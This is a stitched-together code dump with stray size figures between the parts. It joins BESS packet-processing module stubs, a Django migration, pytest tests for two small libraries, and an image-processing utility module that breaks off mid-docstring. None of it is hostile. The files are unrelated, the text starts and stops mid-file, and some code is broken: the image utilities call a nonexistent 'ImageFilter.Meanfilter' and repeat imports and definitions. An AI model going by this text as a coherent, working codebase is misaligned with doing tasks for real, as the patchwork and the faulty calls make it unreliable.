"""
pass
class PortInc(Module):
"""
receives packets from a port
The PortInc module connects a physical or virtual port and releases
packets from it. PortInc does not support multiqueueing.
For details on how to configure PortInc using DPDK, virtual ports,
or libpcap, see the sidebar in the wiki.
__Input Gates__: 0
__Output Gates__: 1
"""
def __init__(self, port=None, prefetch=None):
"""
The PortInc module connects a physical or virtual port and releases
packets from it. PortInc does not support multiqueueing.
For details on how to configure PortInc using DPDK, virtual ports,
or libpcap, see the sidebar in the wiki.
__Input Gates__: 0
__Output Gates__: 1
:param port: The portname to connect to.
:param prefetch: Whether or not to prefetch packets from the port.
"""
pass
def set_burst(self, burst=None):
"""
The module PortInc has a function `set_burst(...)` that allows you to specify the
maximum number of packets to be stored in a single PacketBatch released by
the module.
:param burst: The maximum "burst" of packets (ie, the maximum batch size)
"""
pass
class PortOut(Module):
"""
sends pakets to a port
The PortOut module connects to a physical or virtual port and pushes
packets to it. For details on how to configure PortOut with DPDK,
virtual ports, libpcap, etc, see the sidebar in the wiki.
__Input Gates__: 1
__Output Gates__: 0
"""
def __init__(self, port=None):
"""
The PortOut module connects to a physical or virtual port and pushes
packets to it. For details on how to configure PortOut with DPDK,
virtual ports, libpcap, etc, see the sidebar in the wiki.
__Input Gates__: 1
__Output Gates__: 0
:param port: The portname to connect to.
"""
pass
class Queue(Module):
"""
terminates current task and enqueue packets for new task
The Queue module implements a simple packet queue.
__Input Gates__: 1
__Output Gates__: 1
"""
def __init__(self, size=None, prefetch=None, backpressure=None):
"""
The Queue module implements a simple packet queue.
__Input Gates__: 1
__Output Gates__: 1
:param size: The maximum number of packets to store in the queue.
:param prefetch: When prefetch is enabled, the module will perform CPU prefetch on the first 64B of each packet onto CPU L1 cache. Default value is false.
:param backpressure: When backpressure is enabled, the module will notify upstream if it is overloaded.
"""
pass
def set_burst(self, burst=None):
"""
The module Queue has a function `set_burst(...)` that allows you to specify
the maximum number of packets to be stored in a single PacketBatch released
by the module.
:param burst: The maximum "burst" of packets (ie, the maximum batch size)
"""
pass
def set_size(self, size=None):
"""
The module Queue has a function `set_size(...)` that allows specifying the
size of the queue in total number of packets.
:param size: The maximum number of packets to store in the queue.
"""
pass
def get_status(self):
"""
Modules that are queues or contain queues may contain functions
`get_status()` that return QueueCommandGetStatusResponse.
:return: Modules that are queues or contain queues may contain functions
`get_status()` that take no parameters and returns the queue occupancy and
size.
"""
pass
class QueueInc(Module):
"""
receives packets from a port via a specific queue
The module QueueInc produces input packets from a physical or virtual port.
Unlike PortInc, it supports multiqueue ports.
For details on how to configure QueueInc with DPDK, virtualports,
libpcap, etc, see the sidebar in the wiki.
__Input Gates__: 0
__Output Gates__: 1
"""
def __init__(self, port=None, qid=None, prefetch=None):
"""
The module QueueInc produces input packets from a physical or virtual port.
Unlike PortInc, it supports multiqueue ports.
For details on how to configure QueueInc with DPDK, virtualports,
libpcap, etc, see the sidebar in the wiki.
__Input Gates__: 0
__Output Gates__: 1
:param port: The portname to connect to (read from).
:param qid: The queue on that port to read from. qid starts from 0.
:param prefetch: When prefetch is enabled, the module will perform CPU prefetch on the first 64B of each packet onto CPU L1 cache. Default value is false.
"""
pass
def set_burst(self, burst=None):
"""
The module QueueInc has a function `set_burst(...)` that allows you to specify
the maximum number of packets to be stored in a single PacketBatch released
by the module.
:param burst: The maximum "burst" of packets (ie, the maximum batch size)
"""
pass
class QueueOut(Module):
"""
sends packets to a port via a specific queue
The QueueOut module releases packets to a physical or virtual port.
Unlike PortOut, it supports multiqueue ports.
For details on how to configure QueueOut with DPDK, virtualports,
libpcap, etc, see the sidebar in the wiki.
__Input Gates__: 1
__Output Gates__: 0
"""
def __init__(self, port=None, qid=None):
"""
The QueueOut module releases packets to a physical or virtual port.
Unlike PortOut, it supports multiqueue ports.
For details on how to configure QueueOut with DPDK, virtualports,
libpcap, etc, see the sidebar in the wiki.
__Input Gates__: 1
__Output Gates__: 0
:param port: The portname to connect to.
:param qid: The queue on that port to write out to.
"""
pass
class RandomSplit(Module):
"""
randomly splits/drops packets
The RandomSplit module randomly split/drop packets
__InputGates__: 1
__Output Gates__: many (configurable)
"""
def __init__(self, drop_rate=None, gates=None):
"""
The RandomSplit module randomly split/drop packets
__InputGates__: 1
__Output Gates__: many (configurable)
:param drop_rate: Probability of dropping packet.
:param gates: A list of gate numbers to split the traffic.
"""
pass
def set_droprate(self, drop_rate=None):
"""
The RandomSplit module has a function `set_droprate(...)` which specifies
the probability of dropping packets
:param drop_rate: Probability of dropping packet.
"""
pass
def set_gates(self, gates=None):
"""
The RandomSplit module has a function `set_gates(...)` which changes
the total number of output gates in the module.
:param gates: A list of gate numbers to split the traffic.
"""
pass
class RandomUpdate(Module):
"""
updates packet data with random values
The RandomUpdate module rewrites a specified field (`offset` and `size`) in a packet
with a random value between a specified min and max values.
__Input Gates__: 1
__Output Gates__: 1
"""
def __init__(self, fields=None):
"""
The RandomUpdate module rewrites a specified field (`offset` and `size`) in a packet
with a random value between a specified min and max values.
__Input Gates__: 1
__Output Gates__: 1
:param fields: A list of Random Update Fields.
"""
pass
def add(self, fields=None):
"""
The RandomUpdate module rewrites a specified field (`offset` and `size`) in a packet
with a random value between a specified min and max values.
__Input Gates__: 1
__Output Gates__: 1
:param fields: A list of Random Update Fields.
"""
pass
def clear(self):
"""
The function `clear()` for RandomUpdate takes no parameters and clears all
state in the module.
"""
pass
class Replicate(Module):
"""
makes a copy of a packet and sends it out over n gates
The Replicate module makes copies of a packet sending one copy out over each
of n output gates.
__Input Gates__: 1
__Output Gates__: many (configurable)
"""
def __init__(self, gates=None):
"""
The Replicate module makes copies of a packet sending one copy out over each
of n output gates.
__Input Gates__: 1
__Output Gates__: many (configurable)
:param gates: A list of gate numbers to send packet copies to.
"""
pass
def set_gates(self, gates=None):
"""
The Replicate module has a function `set_gates(...)` which changes
the total number of output gates in the module.
:param gates: A list of gate numbers to replicate the traffic over.
"""
pass
class Rewrite(Module):
"""
replaces entire packet data
The Rewrite module replaces an entire packet body with a packet "template"
converting all packets that pass through to copies of the of one of
the templates.
__Input Gates__: 1
__Output Gates__: 1
"""
def __init__(self, templates=None):
"""
The Rewrite module replaces an entire packet body with a packet "template"
converting all packets that pass through to copies of the of one of
the templates.
__Input Gates__: 1
__Output Gates__: 1
:param templates: A list of bytestrings representing packet templates.
"""
pass
def add(self, templates=None):
"""
The Rewrite module replaces an entire packet body with a packet "template"
converting all packets that pass through to copies of the of one of
the templates.
__Input Gates__: 1
__Output Gates__: 1
:param templates: A list of bytestrings representing packet templates.
"""
pass
def clear(self):
"""
The function `clear()` for Rewrite takes no parameters and clears all state
in the module.
"""
pass
class RoundRobin(Module):
"""
splits packets evenly with round robin
The RoundRobin module splits packets from one input gate across multiple output
gates.
__Input Gates__: 1
__Output Gates__: many (configurable)
"""
def __init__(self, gates=None, mode=None):
"""
The RoundRobin module splits packets from one input gate across multiple output
gates.
__Input Gates__: 1
__Output Gates__: many (configurable)
:param gates: A list of gate numbers to split packets across.
:param mode: Whether to split across gate with every `'packet'` or every `'batch'`.
"""
pass
def set_mode(self, mode=None):
"""
The RoundRobin module has a function `set_mode(...)` which specifies whether
to balance traffic across gates per-packet or per-batch.
:param mode: whether to perform `'packet'` or `'batch'` round robin partitioning.
"""
pass
def set_gates(self, gates=None):
"""
The RoundRobin module has a function `set_gates(...)` which changes
the total number of output gates in the module.
:param gates: A list of gate numbers to round-robin the traffic over.
"""
pass
class SetMetadata(Module):
"""
Set metadata attributes to packets
The SetMetadata module adds metadata attributes to packets, which are not stored
or sent out with packet data. For examples of SetMetadata use, see
[`bess/bessctl/conf/attr_match.bess`](https://github.com/NetSys/bess/blob/master/bessctl/conf/metadata/attr_match.bess)
__Input Gates__: 1
__Output Gates__: 1
"""
def __init__(self, attrs=None):
"""
The SetMetadata module adds metadata attributes to packets, which are not stored
or sent out with packet data. For examples of SetMetadata use, see
[`bess/bessctl/conf/attr_match.bess`](https://github.com/NetSys/bess/blob/master/bessctl/conf/metadata/attr_match.bess)
__Input Gates__: 1
__Output Gates__: 1
:param attrs: A list of attributes to attach to the packet.
"""
pass
class Sink(Module):
"""
discards all packets
The sink module drops all packets that are sent to it.
__Input Gates__: 1
__Output Gates__: 0
"""
def __init__(self):
"""
The sink module drops all packets that are sent to it.
__Input Gates__: 1
__Output Gates__: 0
"""
pass
class Source(Module):
"""
infinitely generates packets with uninitialized data
The Source module generates packets with no payload contents.
__Input Gates__: 0
__Output Gates__: 1
"""
def __init__(self, pkt_size=None):
"""
The Source module generates packets with no payload contents.
__Input Gates__: 0
__Output Gates__: 1
:param pkt_size: The size (in bytes) of packet data to produce.
"""
pass
def set_pkt_size(self, pkt_size=None):
"""
The Source module has a function `set_pkt_size(...)` which specifies the size
of packets to be produced by the Source module.
:param pkt_size: The size (in bytes) of the packets for Source to create.
"""
pass
def set_burst(self, burst=None):
"""
The Source module has a function `set_burst(...)` which
specifies the maximum number of packets to release in a single packetbatch
from the module.
:param burst: The maximum number of packets to release in a packetbatch from the module.
"""
pass
class Split(Module):
"""
split packets depending on packet data or metadata attributes
The Split module is a basic classifier which directs packets out a gate
based on data in the packet (e.g., if the read in value is 3, the packet
is directed out output gate 3).
__Input Gates__: 1
__Output Gates__: many (up to 2^(size * 8))
"""
def __init__(self, size=None, attribute=None, offset=None):
"""
The Split module is a basic classifier which directs packets out a gate
based on data in the packet (e.g., if the read in value is 3, the packet
is directed out output gate 3).
__Input Gates__: 1
__Output Gates__: many (up to 2^(size * 8))
:param size: The size of the value to read in bytes
:param attribute: The name of the metadata field to read.
:param offset: The offset (in bytes) of the data field to read.
"""
pass
class StaticNAT(Module):
"""
Static network address translator
Static NAT module implements one-to-one translation of source/destination
IPv4 addresses. No port number is translated.
L3/L4 checksums are updated correspondingly.
To see an example of NAT in use, see:
[`bess/bessctl/conf/samples/nat.bess`](https://github.com/NetSys/bess/blob/master/bessctl/conf/samples/nat.bess)
Forward direction (from input gate 0 to output gate 0):
- Source IP address is updated, from internal to external address.
Reverse direction (from input gate 1 to output gate 1):
- Destination IP address is updated, from external to internal address.
If the original address is outside any of the ranges, packets are forwarded
without NAT.
Note that address in packet payload (e.g., FTP) are NOT translated.
__Input Gates__: 2 (0 for internal->external, and 1 for external->internal direction)
__Output Gates__: 2 (same as the input gate)
"""
def __init__(self, pairs=None):
"""
Static NAT module implements one-to-one translation of source/destination
IPv4 addresses. No port number is translated.
L3/L4 checksums are updated correspondingly.
To see an example of NAT in use, see:
[`bess/bessctl/conf/samples/nat.bess`](https://github.com/NetSys/bess/blob/master/bessctl/conf/samples/nat.bess)
Forward direction (from input gate 0 to output gate 0):
- Source IP address is updated, from internal to external address.
Reverse direction (from input gate 1 to output gate 1):
- Destination IP address is updated, from external to internal address.
If the original address is outside any of the ranges, packets are forwarded
without NAT.
Note that address in packet payload (e.g., FTP) are NOT translated.
__Input Gates__: 2 (0 for internal->external, and 1 for external->internal direction)
__Output Gates__: 2 (same as the input gate)
"""
pass
def get_initial_arg(self):
pass
def get_runtime_config(self):
pass
def set_runtime_config(self):
pass
class Timestamp(Module):
"""
marks current time to packets (paired with Measure module)
The timestamp module takes an offset parameter. It inserts the current
time in nanoseconds into the packet, to be used for latency measurements
alongside the Measure module. The default offset is after an IPv4 UDP
header.
__Input Gates__: 1
__Output Gates__: 1
"""
def __init__(self, offset=None):
"""
The timestamp module takes an offset parameter. It inserts the current
time in nanoseconds into the packet, to be used for latency measurements
alongside the Measure module. The default offset is after an IPv4 UDP
header.
__Input Gates__: 1
__Output Gates__: 1
"""
pass
class Update(Module):
"""
updates packet data with specified values
The Update module rewrites a field in a packet's data with a specific value.
__Input Gates__: 1
__Output Gates__: 1
"""
def __init__(self, fields=None):
"""
The Update module rewrites a field in a packet's data with a specific value.
__Input Gates__: 1
__Output Gates__: 1
:param fields: A list of Update Fields.
"""
pass
def add(self, fields=None):
"""
The Update module rewrites a field in a packet's data with a specific value.
__Input Gates__: 1
__Output Gates__: 1
:param fields: A list of Update Fields.
"""
pass
def clear(self):
"""
The function `clear()` for Update takes no parameters and clears all state in
the module.
"""
pass
class UpdateTTL(Module):
"""
decreases the IP TTL field by 1
"""
class UrlFilter(Module):
"""
Filter HTTP connection
The URLFilter performs TCP reconstruction over a flow and blocks
connections which mention a banned URL.
__Input Gates__: 2
__Output Gates__: 2
Note that the add() command takes this same argument, and the
clear() command takes an empty argument.
"""
def __init__(self, blacklist=None):
"""
The URLFilter performs TCP reconstruction over a flow and blocks
connections which mention a banned URL.
__Input Gates__: 2
__Output Gates__: 2
Note that the add() command takes this same argument, and the
clear() command takes an empty argument.
:param blacklist: A list of Urls to block.
"""
pass
def get_initial_arg(self):
pass
def get_runtime_config(self):
pass
def set_runtime_config(self, blacklist=None):
"""
The runtime configuration of a URLFilter is the current
blacklist. This means that getting the Arg gets an *empty*
list: we assume anyone using get_initial_arg is also using
get_runtime_config.
:return: The runtime configuration of a URLFilter is the current
blacklist. This means that getting the Arg gets an *empty*
list: we assume anyone using get_initial_arg is also using
get_runtime_config.
"""
pass
def add(self, blacklist=None):
"""
The URLFilter performs TCP reconstruction over a flow and blocks
connections which mention a banned URL.
__Input Gates__: 2
__Output Gates__: 2
Note that the add() command takes this same argument, and the
clear() command takes an empty argument.
:param blacklist: A list of Urls to block.
"""
pass
def clear(self):
pass
class VLANPop(Module):
"""
removes 802.1Q/802.11ad VLAN tag
VLANPop removes the VLAN tag.
__Input Gates__: 1
__Output Gates__: 1
"""
def __init__(self):
"""
VLANPop removes the VLAN tag.
__Input Gates__: 1
__Output Gates__: 1
"""
pass
class VLANPush(Module):
"""
adds 802.1Q/802.11ad VLAN tag
VLANPush appends a VLAN tag with a specified TCI value.
__Input Gates__: 1
__Output Gates__: 1
"""
def __init__(self, tci=None):
"""
VLANPush appends a VLAN tag with a specified TCI value.
__Input Gates__: 1
__Output Gates__: 1
:param tci: The TCI value to insert in the VLAN tag.
"""
pass
def set_tci(self, tci=None):
"""
VLANPush appends a VLAN tag with a specified TCI value.
__Input Gates__: 1
__Output Gates__: 1
:param tci: The TCI value to insert in the VLAN tag.
"""
pass
class VLANSplit(Module):
"""
split packets depending on their VID
Splits packets across output gates according to VLAN id (e.g., id 3 goes out gate 3).
__Input Gates__: 1
__Output Gates__: many
"""
def __init__(self):
"""
Splits packets across output gates according to VLAN id (e.g., id 3 goes out gate 3).
__Input Gates__: 1
__Output Gates__: many
"""
pass
class VXLANDecap(Module):
"""
decapsulates the outer Ethetnet/IP/UDP/VXLAN headers
VXLANDecap module decapsulates a VXLAN header on a packet.
__Input Gates__: 1
__Output Gates__: 1
"""
def __init__(self):
"""
VXLANDecap module decapsulates a VXLAN header on a packet.
__Input Gates__: 1
__Output Gates__: 1
"""
pass
class VXLANEncap(Module):
"""
encapsulates packets with UDP/VXLAN headers
VXLANEncap module wraps a packet in a VXLAN header with a specified destination port.
__Input Gates__: 1
__Output Gates__: 1
"""
def __init__(self, dstport=None):
"""
VXLANEncap module wraps a packet in a VXLAN header with a specified destination port.
__Input Gates__: 1
__Output Gates__: 1
:param dstport: The destination UDP port
"""
pass
class WildcardMatch(Module):
"""
Multi-field classifier with a wildcard match table
The WildcardMatch module matches over multiple fields in a packet and
pushes packets that do match out a specified gate, and those that don't out a default
gate. WildcardMatch is initialized with the fields it should inspect over,
rules are added via the `add(...)` function.
An example of WildcardMatch is in [`bess/bessctl/conf/samples/wildcardmatch.bess`](https://github.com/NetSys/bess/blob/master/bessctl/conf/samples/wildcardmatch.bess)
__Input Gates__: 1
__Output Gates__: many (configurable)
"""
def __init__(self, fields=None):
"""
The WildcardMatch module matches over multiple fields in a packet and
pushes packets that do match out a specified gate, and those that don't out a default
gate. WildcardMatch is initialized with the fields it should inspect over,
rules are added via the `add(...)` function.
An example of WildcardMatch is in [`bess/bessctl/conf/samples/wildcardmatch.bess`](https://github.com/NetSys/bess/blob/master/bessctl/conf/samples/wildcardmatch.bess)
__Input Gates__: 1
__Output Gates__: many (configurable)
:param fields: A list of WildcardMatch fields.
"""
pass
def get_initial_arg(self):
pass
def get_runtime_config(self):
pass
def set_runtime_config(self, default_gate=None, rules=None):
"""
WildcardMatchConfig represents the current runtime configuration
of a WildcardMatch module, as returned by get_runtime_config and
set by set_runtime_config.
:return: WildcardMatchConfig represents the current runtime configuration
of a WildcardMatch module, as returned by get_runtime_config and
set by set_runtime_config.
"""
pass
def add(self, gate=None, priority=None, values=None, masks=None):
"""
The module WildcardMatch has a command `add(...)` which inserts a new rule
into the WildcardMatch module. For an example of code using WilcardMatch see
`bess/bessctl/conf/samples/wildcardmatch.bess`.
:param gate: Traffic matching this new rule will be sent to this gate.
:param priority: If a packet matches multiple rules, the rule with higher priority will be applied. If priorities are equal behavior is undefined.
:param values: The values to check for in each field.
:param masks: The bitmask for each field -- set `0x0` to ignore the field altogether.
"""
pass
def delete(self, values=None, masks=None):
"""
The module WildcardMatch has a command `delete(...)` which removes a rule -- simply specify the values and masks from the previously inserted rule to remove them.
:param values: The values being checked for in the rule
:param masks: The bitmask from the rule.
"""
pass
def clear(self):
"""
The function `clear()` for WildcardMatch takes no parameters, it clears
all state in the WildcardMatch module (is equivalent to calling delete for all rules)
"""
pass
def set_default_gate(self, gate=None):
"""
For traffic which does not match any rule in the WildcardMatch module,
the `set_default_gate(...)` function specifies which gate to send this extra traffic to.
"""
pass
class WorkerSplit(Module):
"""
send packets to output gate X, the id of current worker
WorkerSplit splits packets based on the worker calling ProcessBatch(). It has
two modes.
1) Packets from worker `x` are mapped to output gate `x`. This is the default
mode.
2) When the `worker_gates` field is set, packets from a worker `x` are mapped
to `worker_gates[x]`. In this mode, packet batches from workers not
mapped to an output gate will be dropped.
Calling the `reset` command with an empty `worker_gates` field will revert
WorkerSplit to the default mode.
__Input Gates__: 1
__Output Gates__: many
"""
def __init__(self, worker_gates=None):
"""
WorkerSplit splits packets based on the worker calling ProcessBatch(). It has
two modes.
1) Packets from worker `x` are mapped to output gate `x`. This is the default
mode.
2) When the `worker_gates` field is set, packets from a worker `x` are mapped
to `worker_gates[x]`. In this mode, packet batches from workers not
mapped to an output gate will be dropped.
Calling the `reset` command with an empty `worker_gates` field will revert
WorkerSplit to the default mode.
__Input Gates__: 1
__Output Gates__: many
:param worker_gates: ogate -> worker mask
"""
pass
def reset(self, worker_gates=None):
"""
WorkerSplit splits packets based on the worker calling ProcessBatch(). It has
two modes.
1) Packets from worker `x` are mapped to output gate `x`. This is the default
mode.
2) When the `worker_gates` field is set, packets from a worker `x` are mapped
to `worker_gates[x]`. In this mode, packet batches from workers not
mapped to an output gate will be dropped.
Calling the `reset` command with an empty `worker_gates` field will revert
WorkerSplit to the default mode.
__Input Gates__: 1
__Output Gates__: many
:param worker_gates: ogate -> worker mask
"""
pass
| 62,843 | 19,117 |
# Generated by Django 2.2.9 on 2020-11-20 02:29
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('posts', '0009_auto_20201115_0431'),
]
operations = [
migrations.AddConstraint(
model_name='follow',
constraint=models.UniqueConstraint(fields=('user', 'author'), name='following_unique'),
),
]
| 409 | 144 |
import pytest
from disterminal import helpers
import numpy as np
def main_call(x):
out = np.zeros(x.shape)
out[1] = 0.1
out[-1] = 0.1
return out
def test_autorange():
x = helpers.autorange(main_call, '')
assert x.shape == (100,)
assert x.min() == pytest.approx(-9999.95)
assert x.max() == pytest.approx(9999.95)
| 350 | 148 |
import pytest
from listlookup import ListLookup
sample_list = [
{"id": 1, "country": "us", "name": "Atlanta"},
{"id": 2, "country": "us", "name": "Miami"},
{"id": 3, "country": "uk", "name": "Britain"},
{"id": 5, "country": "uk", "name": "Bermingham"},
{"id": 4, "country": "ca", "name": "Barrie"},
]
def test_lookups():
cities = ListLookup(sample_list)
cities.index("id", lambda d: d['id'], unique=True)
cities.index("country", lambda d: d['country'])
assert list(cities.lookup(id=1, preserve_order=True)) == [
{"id": 1, "country": "us", "name": "Atlanta"}
]
assert list(cities.lookup(id=1, country="us", preserve_order=False)) == [
{"id": 1, "country": "us", "name": "Atlanta"}
]
assert list(cities.lookup(country="us", preserve_order=True)) == [
{"id": 1, "country": "us", "name": "Atlanta"},
{"id": 2, "country": "us", "name": "Miami"}
]
assert list(cities.lookup(id=2, country="uk")) == []
def test_callable_lookup():
cities = ListLookup(sample_list)
cities.index('country', lambda d: d['country'])
cities.index('name', lambda d: d['name'])
callback_call_count = 0
def lookup_starts_with(v):
nonlocal callback_call_count
callback_call_count += 1
return v.startswith('B')
result = list(cities.lookup(country='uk', name=lookup_starts_with))
assert len(result) == 2
assert result[0]['name'].startswith('B')
assert result[1]['name'].startswith('B')
assert callback_call_count == 2
def test_index_multiple():
cities = ListLookup(sample_list)
cities.index('country', lambda d: [d['country'], "%s_a" % d['country'], "%s_b" % d['country']], multiple=True)
cities.index('name', lambda d: [d['name'], "1%s" % d['name'], "2%s" % d['name']], multiple=True)
result = list(cities.lookup(country='uk', name=lambda term: term.startswith('B')))
assert len(result) == 2
assert result[0]['name'].startswith('B')
assert result[1]['name'].startswith('B')
result = list(cities.lookup(country='uk_a', name="2Bermingham"))
assert len(result) == 1
assert result[0]['country'] == 'uk'
assert result[0]['name'] == 'Bermingham'
def test_unique_index_multiple():
cities = ListLookup(sample_list)
cities.index("id", lambda d: [d['id'], d['id'] * 10], unique=True, multiple=True)
assert list(cities.lookup(id=1, preserve_order=True)) == [
{"id": 1, "country": "us", "name": "Atlanta"}
]
assert list(cities.lookup(id=10, preserve_order=True)) == [
{"id": 1, "country": "us", "name": "Atlanta"}
]
assert list(cities.lookup(id=2, preserve_order=True))[0]['id'] != 1
def test_lookup_terminated():
cities = ListLookup(sample_list)
cities.index("id", lambda d: d['id'])
cities.index("country", lambda d: d['country'])
result = list(cities.lookup(id=2, country="xx"))
assert len(result) == 0
def test_lookup_nothing_found():
cities = ListLookup(sample_list)
cities.index("id", lambda d: d['id'])
cities.index("country", lambda d: d['country'])
cities.index("name", lambda d: d['name'])
result = list(cities.lookup(country="xx"))
assert len(result) == 0
result = list(cities.lookup(country='us', name='DC'))
assert len(result) == 0
def test_lookup_does_not_modify_indexes():
"""
There was a bug that modified index after lookup
"""
cities = ListLookup(sample_list)
cities.index("country", lambda d: d['country'])
cities.index("name", lambda d: d['name'])
result = list(cities.lookup(country='us', name='Miami'))
assert len(result) == 1
second_res = list(cities.lookup(country='us', name='Atlanta'))
assert len(second_res) == 1
def test_validation():
cities = ListLookup(sample_list)
cities.index("country", lambda d: d['country'])
with pytest.raises(ValueError):
cities.index("country", lambda d: d['name'])
with pytest.raises(ValueError):
cities.index("preserve_order", lambda d: d['name'])
with pytest.raises(ValueError):
list(cities.lookup(dummy_index='us')) | 4,149 | 1,446 |
import time
import numpy as np
import os, sys, shutil
from contextlib import contextmanager
from numba import cuda as ncuda
import PIL
from PIL import Image, ImageFilter, ImageDraw, ImageFont
import cv2
import contextlib
from copy import deepcopy
import subprocess
from glob import glob
from os import path as osp
from os import path
utilspath = os.path.join(os.getcwd(), 'utils/')
@contextmanager
def timing(description: str) -> None:
start = time.time()
yield
elapsed_time = time.time() - start
print( description + ': finished in ' + f"{elapsed_time:.4f}" + ' s' )
class Quiet:
def __init__(self):
#Store initial stdout in this variable
self._stdout = sys.stdout
def __del__(self):
sys.stdout = self._stdout
@contextmanager
def suppress_stdout(self, raising = False):
with open(os.devnull, "w") as devnull:
error_raised = False
error = "there was an error"
sys.stdout = devnull
try:
yield
except Exception as e:
error_raised = True
error = e
sys.stdout = self._stdout
print(e)
finally:
finished = True
sys.stdout = self._stdout
sys.stdout = self._stdout
if error_raised:
if raising:
raise(error)
else:
print(error)
#Mute stdout inside this context
@contextmanager
def quiet_and_timeit(self, description = "Process running", raising = False, quiet = True):
print(description+"...", end = '')
start = time.time()
try:
if quiet:
#with suppress_stdout(raising):
sys.stdout = open(os.devnull, "w")
yield
if quiet:
sys.stdout = self._stdout
except Exception as e:
if quiet:
sys.stdout = self._stdout
if raising:
sys.stdout = self._stdout
raise(e)
else:
sys.stdout = self._stdout
print(e)
elapsed_time = time.time() - start
sys.stdout = self._stdout
print(': finished in ' + f"{elapsed_time:.4f}" + ' s' )
#Force printing in stdout, regardless of the context (such as the one defined above)
def force_print(self, value):
prev_stdout = sys.stdout
sys.stdout = self._stdout
print(value)
sys.stdout = prev_stdout
def duplicatedir(src,dst):
if not os.path.exists(src):
print('ImagePipeline_utils. duplicatedir: Source directory does not exists!')
return
if src != dst:
if os.path.exists(dst):
shutil.rmtree(dst)
shutil.copytree(src=src,dst=dst)
def createdir_ifnotexists(directory):
#create directory, recursively if needed, and do nothing if directory already exists
os.makedirs(directory, exist_ok=True)
def initdir(directory):
if os.path.exists(directory):
shutil.rmtree(directory)
os.makedirs(directory)
def to_RGB(image):
return image.convert('RGB')
def to_grayscale(image):
return image.convert('L')
def split_RGB_images(input_dir):
imname = '*'
orignames = glob(os.path.join(input_dir, imname))
for orig in orignames:
try:
im = Image.open(orig)
#remove alpha component
im = to_RGB(im)
#split channels
r, g, b = Image.Image.split(im)
r = to_RGB(r)
g = to_RGB(g)
b = to_RGB(b)
#save as png (and remove previous version)
f, e = os.path.splitext(orig)
os.remove(orig)
r.save(f+"_red.png")
g.save(f+"_green.png")
b.save(f+"_blue.png")
except Exception as e:
print(e)
def unsplit_RGB_images(input_dir):
imname = '*_red.png'
orignames = glob(os.path.join(input_dir, imname))
for orig in orignames:
try:
substring = orig[:-8]
r = to_grayscale(Image.open(substring+'_red.png'))
g = to_grayscale(Image.open(substring+'_green.png'))
b = to_grayscale(Image.open(substring+'_blue.png'))
im = Image.merge('RGB', (r,g,b) )
#save as png (and remove monochannel images)
os.remove(substring+'_red.png')
os.remove(substring+'_green.png')
os.remove(substring+'_blue.png')
im.save(substring+".png")
except Exception as e:
print(e)
def preprocess(input_dir, gray = True, resize = True, size = (1000,1000)):
imname = '*'
orignames = glob(os.path.join(input_dir, imname))
for orig in orignames:
try:
im = Image.open(orig)
#remove alpha component
im = to_RGB(im)
#convert to grayscale
if gray:
im = to_grayscale(im)
#resize
if resize:
width, height = im.size
#resize only if larger than limit
if width > size[0] or height > size[1]:
im.thumbnail(size,Image.ANTIALIAS)
#save as png (and remove previous version)
f, e = os.path.splitext(orig)
os.remove(orig)
im.save(f+".png")
except Exception as e:
print(e)
def filtering(input_dir, median = True, median_winsize = 5, mean = True, mean_winsize = 5):
with timing("Filtering (median) with PIL (consider using filtering_opencv for faster processing)"):
imname = '*'
orignames = glob(os.path.join(input_dir, imname))
for orig in orignames:
try:
im = Image.open(orig)
#median blur
if median:
im = im.filter(ImageFilter.MedianFilter(median_winsize))
#mean blur
if mean:
im = im.filter(ImageFilter.Meanfilter(mean_winsize))
#save as png (and remove previous version)
f, e = os.path.splitext(orig)
os.remove(orig)
im.save(f+".png")
except Exception as e:
print(e)
def filtering_opencv(input_dir, median = True, median_winsize = 5, gaussian = True, gaussian_x = 5, gaussian_y = 5, gaussian_std = 0, mean = True, mean_winsize = 3):
with timing("Filtering (median) with opencv"):
imname = '*'
orignames = glob(os.path.join(input_dir, imname))
for orig in orignames:
print(orig)
try:
im = cv2.imread(orig, cv2.IMREAD_COLOR)
#median blur
if median:
im = cv2.medianBlur(im,median_winsize)
if gaussian:
im = cv2.GaussianBlur(im,(gaussian_x,gaussian_y),gaussian_std)
#mean blur
if mean:
im = cv2.blur(im,(mean_winsize,mean_winsize))
#save as png (and remove previous version)
f, e = os.path.splitext(orig)
os.remove(orig)
cv2.imwrite(f+".png", im)
except Exception as e:
print(e)
def rotate_images(input_dir):
imname = '*'
orignames = glob(os.path.join(input_dir, imname))
for orig in orignames:
try:
im = Image.open(orig)
#remove alpha component
im = im.transpose(Image.ROTATE_90)
#save as png (and remove previous version)
f, e = os.path.splitext(orig)
os.remove(orig)
im.save(f+".png")
except Exception as e:
print(e)
def unrotate_images(input_dir):
imname = '*'
orignames = glob(os.path.join(input_dir, imname))
for orig in orignames:
try:
im = Image.open(orig)
#remove alpha component
im = im.transpose(Image.ROTATE_270)
#save as png (and remove previous version)
f, e = os.path.splitext(orig)
os.remove(orig)
im.save(f+".png")
except Exception as e:
print(e)
def reset_gpu(device = 0):
ncuda.select_device(device)
ncuda.close()
import os, time, datetime
#import PIL.Image as Image
import numpy as np
from skimage.measure import compare_psnr, compare_ssim
from skimage.io import imread, imsave
def to_tensor(img):
if img.ndim == 2:
return img[np.newaxis,...,np.newaxis]
elif img.ndim == 3:
return np.moveaxis(img,2,0)[...,np.newaxis]
def from_tensor(img):
return np.squeeze(np.moveaxis(img[...,0],0,-1))
def save_result(result,path):
path = path if path.find('.') != -1 else path+'.png'
ext = os.path.splitext(path)[-1]
if ext in ('.txt','.dlm'):
np.savetxt(path,result,fmt='%2.4f')
else:
imsave(path,np.clip(result,0,1))
fontfile = os.path.join(utilspath,"arial.ttf")
def addnoise(im, sigma = 10, imagetype = 'L', add_label = False):
x = np.array(im)
y = x + np.random.normal(0, sigma, x.shape)
y=np.clip(y, 0, 255)
im = PIL.Image.fromarray(y.astype('uint8'), imagetype)
if add_label:
d = ImageDraw.Draw(im)
fnt = ImageFont.truetype(fontfile, 40)
if imagetype == 'L':
fill = 240
elif imagetype == 'RGB':
fill = (255, 0, 0)
elif imagetype == 'RGBA':
fill = (255,0,0,0)
d.text((10,10), "sigma = %s" % sigma, font = fnt, fill = fill)
return im
utilspath = os.path.join(os.getcwd(), 'utils/')
fontfile = os.path.join(utilspath,"arial.ttf")
def concat_images(img_list, labels = [], imagetype = None, sameheight = True, imagewidth = None, imageheight = None, labelsize = 30, labelpos = (10,10), labelcolor = None):
"""
imagetype: allow to convert all images to a PIL.Image.mode (L = grayscale, RGB, RGBA, ...)
sameheight: put all images to same height (size of smallest image of the list, or imageheight if not None)
